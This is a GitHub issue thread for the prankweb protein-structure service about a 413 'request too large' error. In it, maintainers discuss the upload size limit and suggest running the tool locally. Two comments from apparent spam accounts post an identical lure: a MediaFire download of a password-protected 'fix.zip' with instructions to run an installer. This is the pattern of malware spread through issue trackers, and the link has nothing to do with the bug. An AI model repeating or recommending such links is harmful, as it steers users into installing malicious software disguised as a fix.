### ISSUE TITLE
Can't create new task (status code: 413)

### ISSUE THREAD

**Issue by getlir** [cusbg/prankweb#148]
**Describe the bug**

**To Reproduce**

**Expected behavior**

**Screenshots**

**Additional context**

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by skodapetr** [comment]
@getlir Thank you for reporting the issues. Could you please clarify, is this for Experimental structure, Custom structure or Predicted structure?

**Comment by getlir** [comment]
Thank you for you replay, it is Custom structure.
















At 2024-08-26 18:30:55, "Petr Škoda" ***@***.***> wrote:

@getlir Thank you for reporting the issues. Could you please clarify, is this for Experimental structure, Custom structure or Predicted structure?

**Comment by skodapetr** [comment]
I see, the 413 generaly means too big of a request. Can you please provide a size of a structure you tried to upload for a prediction?

**Comment by luk27official** [comment]
@skodapetr It happens for example with a PDB structure with a code of [5A1V](https://www.rcsb.org/structure/5A1V).

I think that we should increase the size of the files uploaded by the users to resolve this.

**Comment by skodapetr** [comment]
Current size limit is 12M, so [5A1V](https://www.rcsb.org/structure/5A1V) should be fine. 
@getlir If you have larger structure please let us know. Alternatively, you may consider runnign [prankweb locally](https://github.com/cusbg/p2rank-framework/wiki/PrankWeb-Deploy-with-Docker), or [p2rank locally](https://github.com/cusbg/p2rank-framework/wiki/P2Rank-Deploy-with-Docker).
